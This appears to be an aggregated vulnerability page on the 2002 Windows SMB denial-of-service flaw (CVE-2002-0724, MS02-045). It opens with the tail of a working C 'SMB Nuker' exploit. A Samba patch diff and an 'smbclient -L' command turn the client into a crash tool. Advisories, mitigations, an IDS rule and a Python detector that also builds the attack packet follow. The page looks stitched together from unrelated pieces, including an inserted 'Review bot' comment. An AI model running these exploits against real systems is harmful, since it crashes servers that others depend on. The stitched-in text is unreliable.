  if (!select (fd + 1, &rfds, NULL, NULL, &tv))
    {
      fprintf (stderr,
               "The udp read has reached the timeout - try setting the netbios name manually - exiting...\n");
      return NULL;
    }

  recvfrom (fd, buffer, size, 0, NULL, NULL);

  for (i = 0; i < ((nbt_name_query_answer *) buffer)->names; i++)
    if ((uint8_t) * (buffer + sizeof (nbt_name_query_answer) + 18 * i + 15) ==
        0x20)
      return buffer + sizeof (nbt_name_query_answer) + 18 * i;

  printf ("No netbios name available for use - you probably won't be able to crash this host\n");
  printf ("However, you can try setting one manually\n");
  
  return NULL;
}

char *
extract_name (const char *name)
{
  int i;
  char *p = malloc(14);

  for (i = 0; i < 14; i++)
    if (name[i] == ' ')
      break;
     else
      p[i] = name[i];

  p[i] = '\0';

  return p;
}

void
print_banner (void)
{
  printf ("Windows SMB Nuker (DoS) - Proof of concept - CVE CAN-2002-0724\n");
  printf ("Copyright 2002 - Frederic Deletang (df@phear.org) - 28/08/2002\n\n");
}

int
is_smb_header (const unsigned char *buffer, int len)
{
  if (len < sizeof (smb_header))
    return 0;

  if (buffer[0] == 0xff && buffer[1] == 'S' && buffer[2] == 'M'
      && buffer[3] == 'B')
    return 1;
  else
    return 0;
}

int
main (int argc, char **argv)
{
  int fd, r, i, c;
  unsigned char buffer[1024 * 4];       /* Enough. */
  char *hostname = NULL, *name = NULL;

  unsigned int showhelp = 0;

  unsigned int packets = 10;
  unsigned int state;

  unsigned int udp_timeout = 10;
  unsigned int tcp_timeout = 10;

  unsigned short netbios_ssn_port = 139;
  unsigned short netbios_ns_port = 137;

  fd_set rfds;
  struct timeval tv;

  srand (time (NULL));

  print_banner ();

  while ((c = getopt (argc, argv, "N:n:p:P:t:T:h")) != -1)
    {
      switch (c)
        {
        case 'N':
          name = optarg;
          break;
        case 'n':
          packets = atoi (optarg);
          break;
        case 'p':
          netbios_ns_port = atoi (optarg);
          break;
        case 'P':
          netbios_ssn_port = atoi (optarg);
          break;
        case 't':
          udp_timeout = atoi (optarg);
          break;
        case 'T':
          tcp_timeout = atoi (optarg);
          break;
        case 'h':
        default:
          showhelp = 1;
          break;
        }
    }

  if (optind < argc)
	  hostname = argv[optind++];
  
  if (showhelp || hostname == NULL)
    {
      printf ("Usage: %s [options] hostname/ip...\n", argv[0]);
      printf
        ("   -N [netbios-name]         Netbios Name (default: ask the remote host)\n");
      printf
        ("   -n [packets]              Number of crafted packets to send (default: %d)\n",
         packets);
      printf
        ("   -p [netbios-ns port]      UDP Port to query (default: %d)\n",
         netbios_ns_port);
      printf
        ("   -P [netbios-ssn port]     TCP Port to query (default: %d)\n",
         netbios_ssn_port);
      printf
        ("   -t [udp-timeout]          Timeout to wait for receive on UDP ports (default: %d)\n",
         udp_timeout);
      printf
        ("   -T [tcp-timeout]          Timeout to wait for receive on TCP ports (default: %d)\n",
         tcp_timeout);
      printf ("\n");
      printf ("Known vulnerable systems: \n");
      printf ("    - Windows NT 4.0 Workstation/Server\n");
      printf ("    - Windows 2000 Professional/Advanced Server\n");
      printf ("    - Windows XP Professional/Home edition\n\n");
      exit (1);
    }

  if (!name
      && (name =
          list_netbios_names (buffer, sizeof (buffer), hostname,
                              netbios_ns_port, udp_timeout)) == NULL)
    exit (1);
  else
    name = extract_name (name);

  printf ("Using netbios name: %s\n", name);

  printf ("Connecting to remote host (%s:%d)...\n", hostname,
          netbios_ssn_port);

  fd = tcp_connect (hostname, netbios_ssn_port);

  if (fd == -1)
    exit (1);


  FD_ZERO (&rfds);
  FD_SET (fd, &rfds);

  tv.tv_sec = tcp_timeout;
  tv.tv_usec = 0;

  state = STATE_REQUESTING_SESSION_SETUP;

  request_session_setup (fd, name);

  for (;;)
    {
      if (!select (fd + 1, &rfds, NULL, NULL, &tv))
        {
          if (state == STATE_REQUESTING_TRANSACTION)
            {
              fprintf (stderr,
                       "Timeout during TCP read - Seems like the remote host has crashed\n");
              return 0;
            }
          else
            {
              fprintf (stderr,
                       "Nuke failed (tcp timeout) at state %#02x, exiting...\n",
                       state);
              return 1;
            }
        }

      r = read (fd, buffer, sizeof (buffer));

      if (r == 0)
        {
          printf
            ("Nuke failed at state %#02x (EOF, wrong netbios name ?), exiting...\n",
             state);
          exit (1);
        }

      if (((smb_header *) (buffer + 4))->error_class != 0)
        {
          fprintf (stderr, "Nuke failed at state %#02x, exiting...\n", state);
          exit (1);
        }

      switch (state)
        {
        case STATE_REQUESTING_SESSION_SETUP:
          printf ("Negotiating protocol...\n");
          negotiate_protocol (buffer, fd);
          break;
        case STATE_NEGOTIATING_PROTOCOL:
          printf ("Requesting session setup (AndX)\n");
          request_session_setup_andx (buffer, fd);
          break;
        case STATE_REQUESTING_SESSION_SETUP_ANDX:
          printf ("Requesting tree connect (AndX)\n");
          request_tree_connect_andx (buffer, fd, name);
          break;
        case STATE_REQUESTING_TREE_CONNECT_ANDX:
          for (i = 0; i < packets; i++)
            {
              printf ("Requesting transaction (nuking) #%d\n", i + 1);
              request_transaction (buffer, fd);
            }
	    printf ("Wait...\n");
          break;
        default:
          printf ("Seems like the nuke failed :/ (patched ?)\n");
	  exit (1);
        }

      state++;
    }

  return 0;
}

- Vulnerability information (21747)

MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) (EDBID:21747)
windows dos
2002-08-22 Verified
0 zamolx3
N/A [点击下载]
source: http://www.securityfocus.com/bid/5556/info
 
Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reported in the handling of some malformed SMB requests.
 
An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.
 
It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.
 
Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.
 
It has been reported, by "Fabio Pietrosanti (naif)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerability.

http://www.exploit-db.com/sploits/21747.zip

- Vulnerability information (F29518)

iss.smb-dos.txt (PacketStormID:F29518)
2002-08-30 00:00:00
 
denial of service,overflow
windows,nt
CVE-2002-0724
[download]

ISS Security Advisory - Windows NT, 2000, and XP can be crashed remotely by sending a malformed packet to port 139, triggering a heap overflow. MS02-045.

Internet Security Systems Security Alert
August 29, 2002

Microsoft Windows SMB Denial of Service Vulnerability

Synopsis:

A vulnerability has been reported in the Windows file and resource sharing
mechanism. The SMB (Server Message Block) protocol handles the sharing of
files and devices in Windows environments. A flaw in the implementation
of SMB may allow remote attackers to launch DoS (Denial of Service) attacks
against vulnerable systems.

Impact:

A remote attacker can cause a vulnerable system to crash by sending a
specially crafted SMB packet to an open NetBIOS port (TCP port 139).
These ports are typically filtered on outward facing Internet servers.
This vulnerability poses a significant DoS risk to unprotected home or
small/medium size business servers, or any servers not protected by basic
protection systems. An exploit tool for this vulnerability has been
released and is actively circulating in the computer underground. ISS
has detected increased scanning activity for this SMB vulnerability across
the Internet.

Affected Versions:

Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Windows XP Professional

Description:

All affected versions of the Windows operating system are configured with the
vulnerable service enabled by default. SMB is a core component of Windows
networking technology. SMB clients and servers that share and provide network
resources such as files, print sharing, or port sharing use the SMB
protocol to communicate.

A flaw in the Windows SMB implementation may allow attackers to craft special
packets to trigger a heap overflow. The overflow lets the attacker write data
onto the heap, which triggers the DoS. X-Force has examined the
vulnerability in detail and believes that at this time, it is not possible to
control the data that is written onto the heap, therefore it is not possible
to execute arbitrary code by way of this vulnerability.

Recommendations:

X-Force recommends that all SMB traffic be filtered at the perimeter to block
this attack, and similar attacks that involve incorrectly configured SMB
file shares. Windows XP users are encouraged to configure their Internet
Connection Firewall (ICF) to block SMB connections. This recommendation is
particularly significant for home users with "always-on" broadband
connections.

A workaround for this issue exists that may block the DoS attack from
unauthenticated, anonymous users. The local security policy for Windows NT,
2000, and XP allows anonymous connections, or "null sessions". If null
sessions are disallowed, anonymous users cannot successfully exploit the
vulnerability. However, authenticated users can still execute the DoS
attack. To disable null sessions:

On Windows XP, open the Local Security Policy and enable the following
security options:
"Network access: Do not allow anonymous enumeration of SAM accounts"
"Network access: Do not allow anonymous enumeration of SAM accounts
and shares"

On Windows 2000, enable:
"Additional restrictions for anonymous connections"

On Windows NT 4.0 SP3 and later, locate "restrictanonymous" in the following
key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA

"restrictanonymous" should be set to 1 to disable null sessions.

RealSecure 7.0 customers can configure a user-defined event to detect exploit
attempts.

alert tcp any any -> any 139 (msg: "DoS SMB"; flags: A+; content:"|504950455c4c414e4d414e00|";)

For more information on RealSecure 7.0 TRONS events, search for "trons" in
the ISS Knowledgebase: http://www.iss.net/support/knowledgebase/.
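The hex in the rule's content field is the ASCII string `\PIPE\LANMAN` followed by a NUL, i.e. the transaction name of every RAP call, so the rule fires on each legitimate share or server enumeration as well as on the attack. The Python below is an added example, not part of the ISS advisory or of any ISS product: it parses the SMB_COM_TRANSACTION request, checks that the transaction name is `\PIPE\LANMAN`, reads the RAP function number (0, 104 and 215 are NetShareEnum, NetServerEnum2 and NetServerEnum3) and alerts only when MaxParameterCount or MaxDataCount is zero, which is what the Samba exploit patch further down this page produces by passing 0 for both maximums to cli_api(). The packet builder, the TID/PID/UID/MID values, the 0xFFFF data size (assumed here to be Samba's CLI_BUFFER_SIZE) and the sample packets are all constructed for this illustration; the parser handles ASCII transaction names only and skips Unicode ones, and it checks the length of every field before reading it.

```python
import struct

SMB_COM_TRANSACTION = 0x25
NBT_HEADER_LEN = 4                    # NetBIOS session service header
SMB_HEADER_LEN = 32                   # SMB1 header
TRANS_WORDS_FMT = "<HHHHBBHIHHHHHBB"  # the 14 fixed words of SMB_COM_TRANSACTION
TRANS_WORDS_LEN = struct.calcsize(TRANS_WORDS_FMT)   # 28 bytes
LANMAN_PIPE = b"\\PIPE\\LANMAN\x00"   # the bytes behind the ISS content match
# RAP function numbers of the three calls named in the bulletin
RAP_CALLS = {0: "NetShareEnum", 104: "NetServerEnum2", 215: "NetServerEnum3"}


def build_rap_transaction(max_param, max_data, rap_opcode=0):
    """Construct a NetBIOS-framed SMB_COM_TRANSACTION request carrying a RAP call
    over \\PIPE\\LANMAN (sample data built here, not a capture)."""
    # RAP parameter block: function number, parameter descriptor, data descriptor,
    # information level, receive-buffer size (descriptors are the NetShareEnum ones)
    params = (struct.pack("<H", rap_opcode) + b"WrLeh\x00" + b"B13BWz\x00"
              + struct.pack("<HH", 1, 0xFFE0))
    # Offsets in the word block are measured from the start of the SMB header
    bytecount_pos = SMB_HEADER_LEN + 1 + TRANS_WORDS_LEN
    param_offset = bytecount_pos + 2 + len(LANMAN_PIPE)
    data_offset = param_offset + len(params)
    words = struct.pack(TRANS_WORDS_FMT,
                        len(params), 0,             # TotalParameterCount, TotalDataCount
                        max_param, max_data,        # MaxParameterCount, MaxDataCount
                        0, 0,                       # MaxSetupCount, Reserved1
                        0, 0, 0,                    # Flags, Timeout, Reserved2
                        len(params), param_offset,  # ParameterCount, ParameterOffset
                        0, data_offset,             # DataCount, DataOffset
                        0, 0)                       # SetupCount, Reserved3
    # TID/PID/UID/MID are arbitrary values chosen for the sample
    header = struct.pack("<4sBIBHH8sHHHHH",
                         b"\xffSMB", SMB_COM_TRANSACTION, 0,   # protocol, command, Status
                         0x08, 0x0001,                         # Flags, Flags2 (ASCII names)
                         0, b"\x00" * 8, 0,                    # PIDHigh, SecurityFeatures, Reserved
                         1, 0x1234, 1, 1)                      # TID, PIDLow, UID, MID
    smb = (header + bytes([14]) + words
           + struct.pack("<H", len(LANMAN_PIPE) + len(params)) + LANMAN_PIPE + params)
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def parse_rap_transaction(pkt):
    """Return the MaxParameterCount, MaxDataCount and RAP function number of a
    \\PIPE\\LANMAN transaction request, or None for anything else or anything
    too short to judge (no field is read before its bounds are checked)."""
    smb = pkt[NBT_HEADER_LEN:]
    if len(smb) < SMB_HEADER_LEN + 1 + TRANS_WORDS_LEN + 2:
        return None
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_TRANSACTION:
        return None
    flags, flags2 = smb[9], struct.unpack_from("<H", smb, 10)[0]
    if flags & 0x80 or flags2 & 0x8000:
        return None        # a response, or a Unicode transaction name: not handled here
    if smb[SMB_HEADER_LEN] < 14:
        return None        # WordCount must at least cover the fixed words
    (_, _, max_param, max_data, _, _, _, _, _, param_count, param_offset,
     _, _, setup_count, _) = struct.unpack_from(TRANS_WORDS_FMT, smb, SMB_HEADER_LEN + 1)
    bytecount_pos = SMB_HEADER_LEN + 1 + TRANS_WORDS_LEN + 2 * setup_count
    if len(smb) < bytecount_pos + 2:
        return None
    name_start = bytecount_pos + 2
    name_end = smb.find(b"\x00", name_start)
    if name_end < 0 or smb[name_start:name_end + 1].upper() != LANMAN_PIPE:
        return None
    if param_count < 2 or param_offset + 2 > len(smb):
        return None
    rap_opcode = struct.unpack_from("<H", smb, param_offset)[0]
    return {"max_param": max_param, "max_data": max_data, "rap_opcode": rap_opcode}


def classify(pkt):
    """Verdict for one packet: only the three RAP calls with a zero maximum count
    raise an alert, so ordinary share listings do not."""
    t = parse_rap_transaction(pkt)
    if t is None or t["rap_opcode"] not in RAP_CALLS:
        return "ignore"
    call = RAP_CALLS[t["rap_opcode"]]
    if t["max_param"] == 0 or t["max_data"] == 0:
        return "ALERT MS02-045 %s MaxParameterCount=%d MaxDataCount=%d" % (
            call, t["max_param"], t["max_data"])
    return "benign " + call


if __name__ == "__main__":
    # Constructed samples: the counts an unmodified smbclient sends (8 and 0xFFFF,
    # assumed here to be Samba's CLI_BUFFER_SIZE) next to the zeroed counts the
    # exploit patch produces, and an anonymous NetServerEnum2 with the same zeros.
    samples = [("stock smbclient -L", build_rap_transaction(8, 0xFFFF)),
               ("patched smbclient -L", build_rap_transaction(0, 0)),
               ("NetServerEnum2, zero counts", build_rap_transaction(0, 0, 104))]
    for label, pkt in samples:
        print("%-28s %s" % (label, classify(pkt)))
```

The parser is port-agnostic, so feed it the payloads of both 139/tcp and 445/tcp flows; the ISS rule above only watches 139. A server that has the MS02-045 fix applied still receives these packets, so an alert means an attempt, not a confirmed crash.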

ISS X-Force will provide detection and assessment support for this
vulnerability in upcoming X-Press Updates for RealSecure Network Sensor and
Internet Scanner. RealSecure Network Sensor 6.5 and 7.0 can detect this
attack, as well as all SMB null session connection attempts with the
"Windows_Null_Session" event. Internet Scanner can currently assess if
systems are vulnerable to null session connections with the "NetBIOS shares
- null session" check. System Scanner can detect if null sessions are enabled
with the "reg-share-04" check.

Microsoft has released security patches for all affected versions. Please
refer to the Microsoft Security Bulletin referenced in the Additional
Information section.

Additional Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CAN-2002-0724 to this issue. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org), which standardizes names for security problems.

Microsoft Security Bulletin MS02-045
http://www.microsoft.com/technet/security/bulletin/MS02-045.asp

Core Security Technologies Advisory
http://www.corest.com/common/showdoc.php?idx=262&idxseccion=10

X-Force Database
http://www.iss.net/security_center/static/9933.php

Microsoft Windows Internet Connection Firewall overview
http://www.microsoft.com/technet/prodtechnol/winxppro/proddocs/hnw_understanding_firewall.asp
    

- Vulnerability information

2074
Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- Vulnerability description

A vulnerability has been discovered in the Windows Network Share Provider service (Lanman server) that would allow an attacker to remotely crash the operating system of an affected platform. This vulnerability can be triggered through an anonymous null session as well as a valid user account and requires network access to either port 139/tcp or 445/tcp.

- Timeline

2002-08-22 Unknown
Unknown Unknown

- Solution

Install the Microsoft Windows patch from Microsoft TechNet http://www.microsoft.com/technet/security/bulletin/ms02-045.asp, or block access to ports 139 and 445 (not applicable in file and print sharing environments). If possible, remove anonymous access.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Network Share Provider SMB Request Buffer Overflow Vulnerability
Class: Boundary Condition Error    Bugtraq ID: 5556
Remote: Yes    Local: No
Published: 2002-08-22 12:00:00    Updated: 2009-07-11 03:56:00
Credit is given to Alberto Solino and Hernan Ochoa.

- Affected program versions

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco ICS Firmware 2.0
+ Cisco ICS 7750
Cisco ICS Firmware 1.0
+ Cisco ICS 7750
Cisco ICS 7750
Cisco Call Manager 3.2
+ Cisco VoIP Phone 7902G 0
+ Cisco VoIP Phone 7905G 0
+ Cisco VoIP Phone 7912G 0
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0

- Vulnerability discussion

Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reported in the handling of some malformed SMB requests.

An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.

It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.

Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.

It has been reported, by "Fabio Pietrosanti (naif)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerability.

- Exploit

A Samba patch which allows exploitation of this issue is available:

Patch for samba-latest.tar.gz

Exploit with:

smbclient -L <targetIP> -N

--------------------

--- samba-2.2.5.original/source/libsmb/clirap.c Tue Jun 18 21:13:44 2002
+++ samba-2.2.5.exploit/source/libsmb/clirap.c Fri Aug 16 22:17:45 2002
@@ -237,8 +237,10 @@
STR_TERMINATE | STR_CONVERT | STR_ASCII);

if (cli_api(cli,
- param, PTR_DIFF(p,param), 8, /* params, length, max */
- NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+// param, PTR_DIFF(p,param), 8, /* params, length, max */
+// NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+ param, PTR_DIFF(p,param), 0,
+ NULL, 0, 0,
&amp;rparam, &amp;rprcnt, /* return params, return size */
&amp;rdata, &amp;rdrcnt /* return data, return size */
)) {
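Review bot: the change is unconditional, so once this hunk is applied every share listing from the patched smbclient (`smbclient -L <targetIP> -N` as shown above) sends the SMB_COM_TRANSACTION with both maximums zeroed that crashes an unpatched server; build it as a separate binary on an isolated test host rather than replacing the system smbclient. The two `//` lines that keep the old `8` and `CLI_BUFFER_SIZE` arguments are dead code in a file that otherwise uses `/* */` comments and should simply be deleted instead of left in place.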

--------------------

A binary exploit has also been released. This exploit code has not been tested by Symantec. As always, caution is advised when dealing with binary code received from unknown sources. Exploit credit is given to Zamolx3 <zamolx3@personal.ro>.

An exploit has been provided by Frederic Deletang <df@phear.org>.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

It has been reported, by "Fabio Pietrosanti (naif)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerability. Note that this only closes the anonymous path (NetServerEnum2/NetServerEnum3); an authenticated user can still trigger the crash through NetShareEnum, so it is a stopgap until the MS02-045 patch is applied.

It is possible to reduce exposure to this issue by preventing port 445 from binding. On Windows 2000 systems, this can be accomplished by removing the default value "\Device\" from the TransportBindName REG_SZ value under the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters

This system must be restarted for the registry changes to take effect.

Patches are available:


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Professional SP3

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition

Microsoft Windows XP Professional

Microsoft Windows XP 0

Cisco ICS Firmware 1.0

Cisco ICS Firmware 2.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.1 (2)

Cisco Call Manager 3.1

Cisco Call Manager 3.2

- References

 

 
